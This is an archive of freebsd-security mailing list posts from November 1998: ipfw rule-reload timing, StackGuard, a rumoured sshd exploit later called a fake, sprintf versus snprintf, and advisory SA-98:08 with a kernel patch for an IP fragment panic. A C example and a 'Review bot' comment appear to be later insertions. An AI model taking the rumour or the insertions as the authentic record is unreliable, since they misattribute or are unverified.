It would be nice if it were possible to set up the rules, then 'apply' them atomically. I suspect that this is really the equivalent of ifconfig down before ipfw, then ifconfig up at the end. I seem to recall at one stage there were some bugs in the up/down behavior of some network drivers, but that was years and years ago (I hope). Perhaps a better solution is to either a) always order ipfw rule addition, or b) insert a rule '1' that denies all packets, install the rest of the rules, then remove this rule '1' when the rest of the rules modifying the policy are in place. While the current behavior is perfectly consistent, it might catch new users by surprise, as it is a non-obvious source of vulnerability.

Robert N Watson
Carnegie Mellon University http://www.cmu.edu/
TIS Labs at Network Associates, Inc. http://www.tis.com/
SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org http://www.watson.org/~robert/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Wed Nov 4 09:20:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA26989 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:20:49 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id JAA26980 for ; Wed, 4 Nov 1998 09:20:46 -0800 (PST) (envelope-from imp@village.org) Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zb6bU-0003zf-00; Wed, 4 Nov 1998 10:20:20 -0700 Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id KAA00555; Wed, 4 Nov 1998 10:20:22 -0700 (MST) Message-Id: <199811041720.KAA00555@harmony.village.org> To: Barrett Richardson Subject: Re: [rootshell] Security Bulletin #25 (fwd) Cc: spork , Andrew McNaughton , bow ,
FreeBSD-security@FreeBSD.ORG In-reply-to: Your message of "Wed, 04 Nov 1998 10:31:54 EST." References: Date: Wed, 04 Nov 1998 10:20:22 -0700 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Barrett Richardson writes: : I recently got the stackguard compiler : http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ : up and going on my 2.2.7 box. I had high hopes that some definitive : info of the SSH exploit would surface so I could test it against : something real. StackGuard only supports Linux/elf on intel right now. However, it wouldn't be too hard to add FreeBSD elf to this list. FreeBSD aout would be much harder... Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:24:04 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA27648 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:24:04 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from Kitten.mcs.com (Kitten.mcs.com [192.160.127.90]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA27570 for ; Wed, 4 Nov 1998 09:24:01 -0800 (PST) (envelope-from nash@Mars.mcs.net) Received: from Mars.mcs.net (nash@Mars.mcs.net [192.160.127.85]) by Kitten.mcs.com (8.8.7/8.8.2) with ESMTP id LAA20364; Wed, 4 Nov 1998 11:23:52 -0600 (CST) Received: (from nash@localhost) by Mars.mcs.net (8.8.7/8.8.2) id LAA06071; Wed, 4 Nov 1998 11:23:52 -0600 (CST) Message-ID: <19981104112352.B4776@mcs.net> Date: Wed, 4 Nov 1998 11:23:52 -0600 
From: Alex Nash To: Open Systems Networking , freebsd-security@FreeBSD.ORG Subject: Re: Amazing wonder packet sneaks by deny all rule? Mail-Followup-To: Open Systems Networking , freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.93.2i In-Reply-To: ; from Open Systems Networking on Wed, Nov 04, 1998 at 08:28:08AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 08:28:08AM -0500, Open Systems Networking wrote: > > It's really late/early this morning and I was just checking the rule set > on a clients machine I just built. When I saw this: > > 65534 195 14104 deny log ip from any to any > 65535 1 76 deny ip from any to any > > Now maybe it's my lack of sleep but how did that amazing wonder packet > on rule 65535 sneak by 65534 :-) A fluke? A 1 in a million chance? As others have already pointed out, this packet was probably sent before rule 65534 was configured. To verify this, run ipfw -t l to check the timestamp on rule 65535...my guess is it will be equivalent to either your time of last boot (sysctl kern.boottime), or whenever you last reloaded your ruleset. 
Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:51:05 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA01412 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:51:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA01404 for ; Wed, 4 Nov 1998 09:51:00 -0800 (PST) (envelope-from mark@grondar.za) Received: from grondar.za (localhost [127.0.0.1]) by gratis.grondar.za (8.9.1/8.9.1) with ESMTP id TAA00172; Wed, 4 Nov 1998 19:49:51 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <199811041749.TAA00172@gratis.grondar.za> To: "Jordan K. Hubbard" cc: agora@uol.com.br, FreeBSD Security , Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] In-Reply-To: Your message of " Wed, 04 Nov 1998 07:26:25 PST." <5769.910193185@time.cdrom.com> References: <5769.910193185@time.cdrom.com> Date: Wed, 04 Nov 1998 19:49:50 +0200 
From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Jordan K. Hubbard" wrote: > Bah. *More* rumors without proof. "I will not post this exploit.." My sentiments exactly. M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 09:51:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id JAA01541 for freebsd-security-outgoing; Wed, 4 Nov 1998 09:51:41 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from trooper.velocet.ca (host-034.canadiantire.ca [209.146.201.34]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id JAA01518 for ; Wed, 4 Nov 1998 09:51:35 -0800 (PST) (envelope-from dgilbert@trooper.velocet.ca) Received: (from dgilbert@localhost) by trooper.velocet.ca (8.8.7/8.8.7) id MAA14723; Wed, 4 Nov 1998 12:48:42 -0500 (EST) 
From: David Gilbert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <13888.37754.189607.428001@trooper.velocet.ca> Date: Wed, 4 Nov 1998 12:48:42 -0500 (EST) To: Open Systems Networking Cc: freebsd-security@FreeBSD.ORG Subject: Amazing wonder packet sneaks by deny all rule? In-Reply-To: References: X-Mailer: VM 6.62 under Emacs 19.34.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

>>>>> "Open" == Open Systems Networking writes:

Open> It's really late/early this morning and I was just checking the
Open> rule set on a client's machine I just built. When I saw this:

Open> 65534 195 14104 deny log ip from any to any
Open> 65535 1 76 deny ip from any to any

Open> Now maybe it's my lack of sleep but how did that amazing wonder
Open> packet on rule 65535 sneak by 65534 :-) A fluke? A 1 in a
Open> million chance? A possessed packet? This isn't exactly the kind
Open> of thing that instills confidence in one's choice of firewall
Open> software :-) It's ipfw BTW if you can't tell from the syntax, not
Open> ipfilter. I have NEVER seen this happen before, so I'm guessing
Open> it's just a freak accident. But it is curious nonetheless.

Actually, it was likely a packet that occurred between the 'ipfw flush' and the subsequent 'ipfw add 65534' line. I see this all the time on our busier firewalls.

Dave.

-- ============================================================================ |David Gilbert, Velocet Communications. | Two things can only be | |Mail: dgilbert@velocet.net | equal if and only if they | |http://www.velocet.net/~dgilbert | are precisely opposite.
| =========================================================GLO================ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 10:49:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA09882 for freebsd-security-outgoing; Wed, 4 Nov 1998 10:49:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA09872 for ; Wed, 4 Nov 1998 10:49:54 -0800 (PST) (envelope-from jkb@shell6.ba.best.com) Received: (from jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) id KAA02420; Wed, 4 Nov 1998 10:48:45 -0800 (PST) Message-ID: <19981104104845.A1532@best.com> Date: Wed, 4 Nov 1998 10:48:45 -0800 
From: "Jan B. Koum " To: agora@uol.com.br, FreeBSD Security Cc: Cristiano Colpani , Guilherme Galileo Cox , "Nilson R. A. de Brito" Subject: Re: [Fwd: SSHD Exploit] References: <364054DC.DF96B116@agoractvm.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.93.2i In-Reply-To: =?iso-8859-1?Q?=3C364054DC=2EDF96B116=40agoractvm=2Ecom=2Ebr=3E=3B_from_?= =?iso-8859-1?Q?Teleinform=E1tica_on_Wed=2C_Nov_04=2C_1998_at_11:21:32AM_?= =?iso-8859-1?Q?-0200?= Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Nov 04, 1998 at 11:21:32AM -0200, Teleinformática wrote: > > > -- > Regards, > _______________________ > | Nelson 'Stderr' Brito |_________________________________ > |_________________________________________________________| > |Finger Print: | A2E0 D90E 413A 515A 10C9 C0CE 4855 D523 | > | E-mail: | nelson@cyberspace.org | > | URL: | http://www.angelfire.com/sd/stderr | > | Public key: | See the URL | > |______________|__________________________________________| > |ooooooooooooooooooooooooooooooooooooooooooooooooooooooooo| > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > > Received: by pascal (mbox agora) > (with Cubic Circle's cucipop (v1.22 1998/04/11) Wed Nov 4 09:24:47 1998) > X-From_: root Wed Nov 4 01:08:10 1998 > Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) > by pascal.uol.com.br (8.9.1/8.9.1) with ESMTP id BAA12002; > Wed, 4 Nov 1998 01:08:03 -0200 (EDT) > Received: from netspace.org ([128.148.157.6]:54856 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <77774-27536>; Tue, 3 Nov 1998 21:37:34 -0500 > Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with > spool id 4569238 for BUGTRAQ@NETSPACE.ORG; Tue, 3 Nov 1998 21:30:42 > -0500 > Approved-By: aleph1@DFW.NET > Received: from gti.net (apollo.gti.net [199.171.27.7]) by netspace.org > (8.8.7/8.8.7) with ESMTP 
id RAA18872 for ; Sun, > 1 Nov 1998 17:05:06 -0500 > Received: from localhost (jfoutts@localhost) by gti.net (8.9.1/8.8.8) with > ESMTP id RAA24814 for ; Sun, 1 Nov 1998 > 17:05:07 -0500 (EST) > MIME-Version: 1.0 > Content-Type: TEXT/PLAIN; charset=US-ASCII > Message-ID: > Date: Sun, 1 Nov 1998 17:05:07 -0500 > Reply-To: Justin Foutts > Sender: Bugtraq List > From: Justin Foutts > Subject: SSHD Exploit > To: BUGTRAQ@netspace.org > X-Mozilla-Status2: 00000000 > > On a system I administer I found a program named sshdwarez.c in one of my > user's home directories. Upon further inspection I found that this was > the source code of an x86/Linux remote buffer overflow exploit for sshd > versions 1.2.26 and below. I have tested this exploit on a number of my > systems and have obtained remote root access on each one. I will not post > this exploit as it could give crackers a tool to gain unauthorized access > to systems. I STRONGLY recommend that everyone upgrade their versions of > sshd as soon as possible. > > Thanks! > Justin > [quoting a1] Date: Wed, 4 Nov 1998 11:22:08 -0600 
From: Aleph One Subject: Re: SSHD Exploit To: BUGTRAQ@netspace.org This one was a fake folks. Little kids having their fun. Apologies for approving it. It was a long day. All persons that have examined the ssh code so far have found it to be secure (so far). If you require a safety net to sleep well at night while running sshd I recommend you recompile it with the StackGuard compiler (if you are running on a x86 or want to port it). http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 [end] Can we let all the SSH threads die now?!?! Please? :) -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 10:53:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA10770 for freebsd-security-outgoing; Wed, 4 Nov 1998 10:53:58 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from phoenix (phoenix.aye.net [206.185.8.134]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA10761 for ; Wed, 4 Nov 1998 10:53:53 -0800 (PST) (envelope-from brich@aye.net) Received: (qmail 2461 invoked by uid 7506); 4 Nov 1998 18:52:25 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 4 Nov 1998 18:52:25 -0000 Date: Wed, 4 Nov 1998 13:52:25 -0500 (EST) 
From: Barrett Richardson To: Warner Losh cc: spork , Andrew McNaughton , bow , FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: <199811041720.KAA00555@harmony.village.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 4 Nov 1998, Warner Losh wrote: > In message Barrett Richardson writes: > : I recently got the stackguard compiler > : http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ > : up and going on my 2.2.7 box. I had high hopes that some definitive > : info of the SSH exploit would surface so I could test it against > : something real. > > StackGuard only supports Linux/elf on intel right now. However, it I have it up and going on my 2.2.7 box. Been running some stackguard compiled apps (ssh 1.2.26 for one) and they've been working like a champ. Wrote a couple of test programs to see if it would catch a canary overrun, and indeed it does. Did nothing to the sources but twiddle with dots and underscores. Why would aout vs. elf matter? Are the stack frames different? It's been working for me. Did have to build gas. -- Barrett > wouldn't be too hard to add FreeBSD elf to this list. FreeBSD aout > would be much harder... 
> > Warner > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 10:54:31 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA11125 for freebsd-security-outgoing; Wed, 4 Nov 1998 10:54:31 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA11106 for ; Wed, 4 Nov 1998 10:54:29 -0800 (PST) (envelope-from marcs@znep.com) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.9.1a/8.9.1) with UUCP id LAA09640; Wed, 4 Nov 1998 11:54:09 -0700 (MST) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with ESMTP id KAA14459; Wed, 4 Nov 1998 10:48:53 -0800 (PST) Date: Wed, 4 Nov 1998 10:48:53 -0800 (PST) 
From: Marc Slemko To: Andrew McNaughton cc: FreeBSD-security@FreeBSD.ORG Subject: Re: [rootshell] Security Bulletin #25 (fwd) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Wed, 4 Nov 1998, Andrew McNaughton wrote:
> On Wed, 4 Nov 1998, Nicholas Charles Brawn wrote:
> > Well I just grabbed 1.2.26 and did:
> > find . -exec grep sprintf {} \; |wc -l
> >
> > And came up with 138 lines. Just having sprintf() in your code is not
> > indicative of a vulnerability, but it's still a high number.
>
> ssh is commonly used for piping substantial amounts of data, and can
> probably claim good reasons for using the faster non-bounds-checking
> routines in many of these cases. Doesn't apply to low volume things like
> the logging routines though.

NO! Get all ideas of bounds checking only being suitable for "low volume" things out of your mind.

First, if ssh is using sprintf for any bulk data copies then it is horribly broken anyway. Second, by the very nature of bulk data copies you have to have fixed bounds on the size of the data you are copying. Functions that do bounds checking, like snprintf(), do not have any significant performance drawbacks in 99.9% of the cases. There are far more differences between sprintf implementations than between sprintf and snprintf. In fact, on FreeBSD sprintf() and snprintf() both call the same function; the only difference is that sprintf sets _size to INT_MAX while snprintf sets it to what you tell it.
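Marc's point above, that bounded formatting costs nothing worth measuring and belongs in logging paths too, shown as an added example (this is not code from ssh 1.2.26 or from anyone on the list): a log-line formatter that uses the return value of snprintf() both to detect truncation into a fixed buffer and to size an exact allocation. The function names, the message format and the sample inputs are constructed for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example (not from the ssh sources): bounded formatting of a log
 * line such as a daemon might emit on login.  snprintf() never writes more
 * than bufsize bytes and returns the length the full string would have had,
 * so truncation is detectable instead of silently overrunning the buffer,
 * which is what sprintf() into the same fixed buffer would do.
 *
 * Returns 0 when the whole line fit, -1 when it was truncated or on error.
 * On truncation buf still holds a NUL-terminated prefix.
 */
int format_login_line(char *buf, size_t bufsize,
                      const char *user, const char *host, int port)
{
    int n;

    if (buf == NULL || bufsize == 0)
        return -1;
    n = snprintf(buf, bufsize, "login from %s@%s port %d", user, host, port);
    if (n < 0) {                 /* encoding error: leave a safe empty string */
        buf[0] = '\0';
        return -1;
    }
    if ((size_t)n >= bufsize)    /* output did not fit; snprintf truncated */
        return -1;
    return 0;
}

/*
 * The same line sized exactly: a first snprintf() with a zero-length buffer
 * only measures, the buffer is then allocated to fit and formatted again.
 * This is the bounds-checked answer to "the length isn't known up front".
 * Returns a malloc()ed string the caller frees, or NULL on failure.
 */
char *format_login_line_alloc(const char *user, const char *host, int port)
{
    int n;
    size_t len;
    char *buf;

    n = snprintf(NULL, 0, "login from %s@%s port %d", user, host, port);
    if (n < 0)
        return NULL;
    len = (size_t)n + 1;                         /* room for the NUL */
    buf = malloc(len);
    if (buf == NULL)
        return NULL;
    if (format_login_line(buf, len, user, host, port) != 0) {
        free(buf);                               /* only if the inputs changed
                                                    between the two calls */
        return NULL;
    }
    return buf;
}

/* Stand-alone demonstration: a long hostname (constructed input) would
 * overflow the small buffer under sprintf(); here it is truncated and
 * reported, and the exact-size variant holds it whole. */
int main(void)
{
    char small[24];
    char *full;
    char longhost[201];          /* constructed: 200 'a' characters */

    memset(longhost, 'a', sizeof longhost - 1);
    longhost[sizeof longhost - 1] = '\0';

    if (format_login_line(small, sizeof small, "dan", longhost, 22) != 0)
        printf("truncated: \"%s\" (%zu bytes kept)\n", small, strlen(small));

    full = format_login_line_alloc("dan", longhost, 22);
    if (full != NULL) {
        printf("exact allocation of %zu bytes\n", strlen(full) + 1);
        free(full);
    }
    return 0;
}
```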
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 11:07:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA13759 for freebsd-security-outgoing; Wed, 4 Nov 1998 11:07:21 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA13754 for ; Wed, 4 Nov 1998 11:07:20 -0800 (PST) (envelope-from cschuber@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.9.1/8.8.8) id LAA31825 for ; Wed, 4 Nov 1998 11:07:11 -0800 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda31823; Wed Nov 4 11:07:08 1998 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.1/8.9.1) id LAA28962 for ; Wed, 4 Nov 1998 11:07:08 -0800 (PST) Message-Id: <199811041907.LAA28962@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdv28955; Wed Nov 4 11:06:20 1998 X-Mailer: exmh version 2.0.2 2/24/98 Reply-to: Cy Schubert - ITSD Open Systems Group X-Sender: cschuber To: freebsd-security@FreeBSD.ORG Subject: Re: SSHD Exploit Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Nov 1998 11:06:20 -0800 
From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It is normally against my policy to forward posts from one mailing list to another; however, this should answer some of the questions caused by a previous "cross post" from BUGTRAQ. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: cschuber@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Government of BC ------- Forwarded Message Return-Path: owner-bugtraq@netspace.org Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.1/8.9.1) id JAA24588 for ; Wed, 4 Nov 1998 09:44:46 -0800 (PST) Received: from point.osg.gov.bc.ca(142.32.102.44) via SMTP by passer.osg.gov.bc.ca, id smtpdq24585; Wed Nov 4 09:43:47 1998 Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.9.1/8.8.8) id JAA31567 for ; Wed, 4 Nov 1998 09:43:34 -0800 Received: from brimstone.netspace.org(128.148.157.143) via SMTP by point.osg.gov.bc.ca, id smtpda31565; Wed Nov 4 09:43:18 1998 Received: from netspace.org ([128.148.157.6]:10872 "EHLO netspace.org" ident: "TIMEDOUT2") by brimstone.netspace.org with ESMTP id <77546-30278>; Wed, 4 Nov 1998 12:38:10 -0500 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 4640495 for BUGTRAQ@NETSPACE.ORG; Wed, 4 Nov 1998 12:31:03 -0500 Approved-By: aleph1@DFW.NET Received: from dfw.nationwide.net (dfw.nationwide.net [198.175.15.10]) by netspace.org (8.8.7/8.8.7) with ESMTP id MAA08242 for ; Wed, 4 Nov 1998 12:25:01 -0500 Received: from localhost (aleph1@localhost) by dfw.nationwide.net (8.9.0/8.9.0) with SMTP id LAA15322 for ; Wed, 4 Nov 1998 11:22:09 -0600 (CST) X-Sender: aleph1@dfw.nationwide.net MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Message-ID: Date: Wed, 4 Nov 1998 11:22:08 -0600 Reply-To: Aleph One Sender: Bugtraq List
From: Aleph One Subject: Re: SSHD Exploit To: BUGTRAQ@netspace.org This one was a fake folks. Little kids having their fun. Apologies for approving it. It was a long day. All persons that have examined the ssh code so far have found it to be secure (so far). If you require a safety net to sleep well at night while running sshd I recommend you recompile it with the StackGuard compiler (if you are running on a x86 or want to port it). http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/ Aleph One / aleph1@dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 ------- End of Forwarded Message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 11:37:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA19846 for freebsd-security-outgoing; Wed, 4 Nov 1998 11:37:48 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA19841; Wed, 4 Nov 1998 11:37:40 -0800 (PST) (envelope-from security-officer@freebsd.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id UAA12845; Wed, 4 Nov 1998 20:37:28 +0100 (MET) Date: Wed, 4 Nov 1998 20:37:28 +0100 (MET) Message-Id: <199811041937.UAA12845@gvr.gvr.org> 
From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment Reply-To: security-officer@FreeBSD.ORG To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

=============================================================================
FreeBSD-SA-98:08                                            Security Advisory
                                                                FreeBSD, Inc.

Topic:          IP fragmentation denial of service

Category:       core
Module:         kernel
Announced:      1998-11-04
Affects:        FreeBSD 3.0 and FreeBSD-current before the correction date.
Corrected:      FreeBSD-3.0 and FreeBSD-current as of 1998/10/27
FreeBSD only:   Yes

Patches:        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:08/

I.   Background

IP connections are controlled through a series of packets that are received by the two computers involved in the connection. When packets are too large to be sent in a single IP packet (due to interface hardware limitations, for example), they can be fragmented (unless prohibited by the Don't Fragment flag). The final destination will reassemble all the fragments of an IP packet and pass it to higher protocol layers (like TCP or UDP).

II.  Problem Description

There is a bug in the IP fragment reassembly code that might lead to a kernel panic. An attacker can create and send a pair of malformed IP packets which are then reassembled into an invalid UDP datagram. Such a UDP datagram would then cause a server to panic and crash.

III. Impact

When this bug is exploited the operating system will panic. This results in a reboot of the system. This vulnerability has been discussed in public security forums and exploit programs are circulating to take advantage of this bug.

IV.  Workaround

None.

V.
Solution Index: ip_input.c =================================================================== RCS file: /home/cvsup/freebsd/CVS/src/sys/netinet/ip_input.c,v retrieving revision 1.102 retrieving revision 1.103 diff -u -u -r1.102 -r1.103 --- ip_input.c 1998/10/16 03:55:01 1.102 +++ ip_input.c 1998/10/27 09:11:41 1.103 
@@ -750,7 +750,7 @@ * if they are completely covered, dequeue them. */ for (; q != NULL && ip->ip_off + ip->ip_len > GETIP(q)->ip_off; - p = q, q = nq) { + q = nq) { i = (ip->ip_off + ip->ip_len) - GETIP(q)->ip_off; if (i < GETIP(q)->ip_len) { ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- -----END PGP SIGNATURE----- From owner-freebsd-security Wed Nov 4 12:35:08 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA28740 for freebsd-security-outgoing; Wed, 4 Nov 1998 12:35:08 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id MAA28715 for ; Wed, 4 Nov 1998 12:35:00 -0800 (PST) (envelope-from sthaug@nethelp.no)
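Review bot: the only change in the ip_input.c hunk is dropping `p = q` from the for-loop increment, and the trailing context stops at `if (i < GETIP(q)->ip_len) {`, so the diff does not show what the rest of the loop body or the code after the loop does with `p`. The comment above the loop says fragments that are completely covered are dequeued; advancing `p` to a fragment that the previous iteration has just dequeued would leave `p` referring to an entry no longer in the queue, which would explain a panic of the kind the advisory describes, but the hunk alone does not establish it. A short comment next to the loop header stating why `p` must remain at the last fragment still in the queue would make the intent reviewable from the diff itself, and anyone applying this by hand should confirm that every later use of `p` in the function expects it to be the surviving predecessor of `q` rather than the last fragment visited.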
From: sthaug@nethelp.no Received: (qmail 11128 invoked by uid 1001); 4 Nov 1998 20:34:48 +0000 (GMT) To: security-officer@FreeBSD.ORG Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-98:08.fragment In-Reply-To: Your message of "Wed, 4 Nov 1998 20:37:28 +0100 (MET)" References: <199811041937.UAA12845@gvr.gvr.org> X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Date: Wed, 04 Nov 1998 21:34:48 +0100 Message-ID: <11126.910211688@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Topic: IP fragmentation denial of service > > Category: core > Module: kernel > Announced: 1998-11-04 > Affects: FreeBSD 3.0 and > FreeBSD-current before the correction date. > Corrected: FreeBSD-3.0 and FreeBSD-current as of 1998/10/27 > FreeBSD only: Yes > > Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:08/ Please note that the fragment and fragment.asc files in the SA-98:08 directory are in reality the rst-current and rst-current.asc from SA-98:07. You probably want to change this. Steinar Haug, Nethelp consulting, sthaug@nethelp.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Nov 4 12:44:50 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id 